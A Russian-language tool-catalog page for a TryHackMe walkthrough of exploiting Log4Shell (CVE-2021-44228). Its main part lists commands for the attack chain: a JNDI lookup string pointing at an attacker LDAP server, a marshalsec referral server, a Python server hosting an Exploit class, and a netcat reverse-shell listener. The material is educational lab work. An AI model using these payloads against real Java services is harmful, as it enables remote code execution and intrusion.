Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
solar-exploiting-log4j — Этот репозиторий предоставляет подробное пошаговое руководство по комнате *Solar Exploiting Log4j* на TryHackMe, сфокусированное на эксплуатации критической уязвимости Log4Shell (CVE-2021-44228). Проект демонстрирует, как злоумышленники могут использовать небезопасные механизмы логирования в Java-приложениях для достижения удаленного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/lavanya2085/solar-exploiting-log4j
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

Репозиторий
135 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот репозиторий предоставляет подробное пошаговое руководство по комнате *Solar Exploiting Log4j* на TryHackMe, сфокусированное на эксплуатации критической уязвимости Log4Shell (CVE-2021-44228). Проект демонстрирует, как злоумышленники могут использовать небезопасные механизмы логирования в Java-приложениях для достижения удаленного выполнения кода.

Поделиться

🔥 Solar Exploiting Log4j - Пошаговое руководство TryHackMe

📌 Комната: Solar Exploiting Log4j

Платформа: TryHackMe Сложность: Средняя Тема: Log4Shell (уязвимость Log4j)


🧠 Цель

Эксплуатировать уязвимость Log4j (CVE-2021-44228) для получения удаленного выполнения кода и захвата флагов.


🛠️ Используемые инструменты

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Шаг 1: Разведка

🔍 Сканирование цели

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Результаты

  • Открытые порты: 80 (HTTP), другие в зависимости от комнаты
  • Веб-приложение с бэкендом на Java

  • 🌐 Шаг 2: Перебор веб-приложения

    • Посетить веб-приложение в браузере
    • Взаимодействовать с полями ввода (логин/поиск/заголовки)
    • Перехватить запрос с помощью Burp Suite

    💥 Шаг 3: Обнаружение уязвимости Log4j

    Уязвимость Log4j позволяет внедрение JNDI:

    root@kitploit:~
    ${jndi:ldap://<ATTACKER_IP>:1389/a}
    

    Если ввод логируется → уязвимость присутствует.


    ⚙️ Шаг 4: Настройка слушателя

    Запуск Netcat

    root@kitploit:~
    nc -lvnp 4444
    

    Запуск вредоносного LDAP-сервера (пример)

    root@kitploit:~
    git clone https://github.com/mbechler/marshalsec
    cd marshalsec
    mvn clean package
    

    Запуск LDAP-сервера:

    root@kitploit:~
    java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
    

    📡 Шаг 5: Размещение полезной нагрузки

    root@kitploit:~
    python3 -m http.server 8000
    

    Создать вредоносный Java-класс (Exploit.class)


    🚀 Шаг 6: Запуск эксплойта

    Внедрить полезную нагрузку в уязвимое поле:

    root@kitploit:~
    ${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
    

    💡 Используйте заголовки, например:

    • User-Agent
    • X-Api-Version

    🖥️ Шаг 7: Получение обратной оболочки

    После срабатывания:

    • Цель подключается обратно к слушателю Netcat
    • Вы получаете доступ к оболочке

    🔐 Шаг 8: Повышение привилегий (если требуется)

    Проверить:

    root@kitploit:~
    sudo -l
    

    Искать:

    • Неправильно настроенные SUID-бинарники
    • Записываемые файлы
    • Задания cron

    🚩 Шаг 9: Захват флагов

    root@kitploit:~
    find / -name flag.txt 2>/dev/null
    cat flag.txt
    

    🧾 Ключевые изученные концепции

    • Log4Shell (CVE-2021-44228)
    • Внедрение JNDI
    • Удаленное выполнение кода (RCE)
    • Обратная оболочка
    • Эксплуатация веб-приложений

    Скачать инструмент